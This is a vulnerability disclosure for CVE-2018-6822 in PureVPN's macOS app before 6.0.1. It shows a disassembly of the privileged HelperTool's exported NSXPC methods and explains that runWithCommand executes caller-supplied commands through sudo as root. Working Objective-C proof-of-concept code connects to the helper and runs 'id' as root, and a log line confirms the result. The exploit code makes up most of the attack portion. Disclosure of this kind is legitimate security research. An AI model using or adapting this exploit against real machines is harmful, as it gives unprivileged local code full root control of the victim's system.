Download: https://www.purevpn.com/download
CVE: CVE-2018-6822
Author: Benjamin Watson of VerSprite Security
Affected: < 6.0.1
The PureVPN's com.purevpn.macapp.HelperTool NSXPC service's protocol defines the following method __objc2_meth <offset sel_runWithCommand_withArguments_usingSudo_withReply
in its list of exported methods.
__objc_const:0000000100014910 _OBJC_INSTANCE_METHODS_HelperToolProtocol __objc2_meth_list <18h, 1Bh>
__objc_const:0000000100014910 ; DATA XREF: __data:_OBJC_PROTOCOL_$_HelperToolProtocol↓o
__objc_const:0000000100014918 __objc2_meth <offset sel_connectWithEndpointReply_, offset aV240816_0,\ ; "connectWithEndpointReply:" ...
__objc_const:0000000100014918 0>
__objc_const:0000000100014930 __objc2_meth <offset sel_getVersionWithReply_, offset aV240816_0, 0> ; "getVersionWithReply:" ...
__objc_const:0000000100014948 __objc2_meth <offset sel_readLicenseKeyAuthorization_withReply_, \ ; "readLicenseKeyAuthorization:withReply:" ...
__objc_const:0000000100014948 offset aV32081624, 0>
__objc_const:0000000100014960 __objc2_meth <offset sel_writeLicenseKey_authorization_withReply_, \ ; "writeLicenseKey:authorization:withReply"... ...
__objc_const:0000000100014960 offset aV4008162432, 0>
__objc_const:0000000100014978 __objc2_meth <offset sel_bindToLowNumberPortAuthorization_withReply_, \ ; "bindToLowNumberPortAuthorization:withRe"... ...
__objc_const:0000000100014978 offset aV32081624, 0>
__objc_const:0000000100014990 __objc2_meth <offset sel_testFunctionAppsAuthorization_configObj_usingPreferencesRef_withReply_,\ ; "testFunctionAppsAuthorization:configObj"... ...
__objc_const:0000000100014990 offset aV48081624Scpre, 0>
__objc_const:00000001000149A8 __objc2_meth <offset sel_createServicesAuthorization_configObj_usingPreferencesRef_withReply_,\ ; "createServicesAuthorization:configObj:u"... ...
__objc_const:00000001000149A8 offset aV48081624Scpre, 0>
__objc_const:00000001000149C0 __objc2_meth <offset sel_createPasswordKeyChainItemAuthorization_lable_forService_withAccount_andPassword_withReply_,\ ; "createPasswordKeyChainItemAuthorization"... ...
__objc_const:00000001000149C0 offset aV6408162432404, 0>
__objc_const:00000001000149D8 __objc2_meth <offset sel_createSharedSecretKeyChainItemAuthorization_lable_forService_withPassword_withReply_,\ ; "createSharedSecretKeyChainItemAuthoriza"... ...
__objc_const:00000001000149D8 offset aV5608162432404, 0>
__objc_const:00000001000149F0 __objc2_meth <offset sel_createXAuthKeyChainItemAuthorization_lable_forService_withPassword_withReply_,\ ; "createXAuthKeyChainItemAuthorization:la"... ...
__objc_const:00000001000149F0 offset aV5608162432404, 0>
__objc_const:0000000100014A08 __objc2_meth <offset sel_executeVPNServiceConfigServer_withAccount_andPassword_andShareSecret_andType_HelperToolWithReply_,\ ; "executeVPNServiceConfigServer:withAccou"... ...
__objc_const:0000000100014A08 offset aV640816243240q, 0>
__objc_const:0000000100014A20 __objc2_meth <offset sel_setIpv6Leak_networkInterfaces_withReply_, \ ; "setIpv6Leak:networkInterfaces:withReply"... ...
__objc_const:0000000100014A20 offset aV3608c162028, 0>
__objc_const:0000000100014A38 __objc2_meth <offset sel_setRules_withReply_, offset aV32081624, 0> ; "setRules:withReply:" ...
__objc_const:0000000100014A50 __objc2_meth <offset sel_removeAllRulesWithReply_, offset aV240816_0, \ ; "removeAllRulesWithReply:" ...
__objc_const:0000000100014A50 0>
__objc_const:0000000100014A68 __objc2_meth <offset sel_activateOnStartupWithReply_, \ ; "activateOnStartupWithReply:" ...
__objc_const:0000000100014A68 offset aV240816_0, 0>
__objc_const:0000000100014A80 __objc2_meth <offset sel_deactivateOnStartupWithReply_, \ ; "deactivateOnStartupWithReply:" ...
__objc_const:0000000100014A80 offset aV240816_0, 0>
__objc_const:0000000100014A98 __objc2_meth <offset sel_getVersionsWithReply_, offset aV240816_0, 0> ; "getVersionsWithReply:" ...
__objc_const:0000000100014AB0 __objc2_meth <offset sel_executeTestFunctionInHelperToolWithReply_, \ ; "executeTestFunctionInHelperToolWithRepl"... ...
__objc_const:0000000100014AB0 offset aV240816_0, 0>
__objc_const:0000000100014AC8 __objc2_meth <offset sel_executePreferencesRefInHelperToolWithReply_, \ ; "executePreferencesRefInHelperToolWithRe"... ...
__objc_const:0000000100014AC8 offset aV240816_0, 0>
__objc_const:0000000100014AE0 __objc2_meth <offset sel_copySSTPFiles_, offset aV240816, 0> ; "copySSTPFiles:" ...
__objc_const:0000000100014AF8 __objc2_meth <offset sel_copyIPSECFiles_, offset aV240816, 0> ; "copyIPSECFiles:" ...
__objc_const:0000000100014B10 __objc2_meth <offset sel_connectSSTP_withAccount_andPassword_Executable_mtuInterfaceValue_withReply_,\ ; "connectSSTP:withAccount:andPassword:Exe"... ...
__objc_const:0000000100014B10 offset aV6408162432404, 0>
__objc_const:0000000100014B28 __objc2_meth <offset sel_executeSudo_WithReply_, offset aV32081624, 0> ; "executeSudo:WithReply:" ...
__objc_const:0000000100014B40 __objc2_meth <offset sel_disconnectSSTP_, offset aV240816_0, 0> ; "disconnectSSTP:" ...
__objc_const:0000000100014B58 __objc2_meth <offset sel_setMTUInterface_mtuValue_WithReply_, \ ; "setMTUInterface:mtuValue:WithReply:" ...
__objc_const:0000000100014B58 offset aV4008162432, 0>
__objc_const:0000000100014B70 __objc2_meth <offset sel_setSecureDNSWithServiceId_withDNS_WithReply_,\ ; "setSecureDNSWithServiceId:withDNS:WithR"... ...
__objc_const:0000000100014B70 offset aV4008162432, 0>
__objc_const:0000000100014B88 __objc2_meth <offset sel_runWithCommand_withArguments_usingSudo_withReply_,\ ; "runWithCommand:withArguments:usingSudo:"... ...
__objc_const:0000000100014B88 offset aV44081624c3236, 0>This method ends up calling -[HelperTool runCommand:withArguments:usingSudo:] with the arguments that
it received from the NSXPC client. The -[HelperTool runCommand:withArguments:usingSudo:] in turn calls
-[HelperTool runCommand:withArguments:], again with the arguments from the NSXPC caller. Because the HelperTool has root privileges once it has been installed by the user, it simply executes a command sent to it from the NSXPC client via NSTask in the following way:
/usr/bin/sudo <command> <args>
@protocol HelperToolProtocol
-(void)runWithCommand:(id)command withArguments:(NSArray*)withArguments usingSudo:(char)usingSudo withReply:(void(^)(char))withReply;
@end
NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:@"com.purevpn.macapp.HelperTool" options:NSXPCConnectionPrivileged];
connection.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
NSLog(@"[+] NSXPCConnection established -> %@ [!]", connection);
connection.interruptionHandler = ^{
NSLog(@"Connection Terminated");
};
connection.invalidationHandler = ^{
NSLog(@"Connection Invalidated");
};
[connection resume];
NSArray* args = [NSArray arrayWithObjects: @"", @"", nil];
[[connection remoteObjectProxy] runWithCommand:@"id" withArguments:args usingSudo:(char)1 withReply:^(char c) {
//NSLog(@"%@", result);
}];
Feb 9 07:24:52 users-Mac sudo[1083] <Notice>: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/id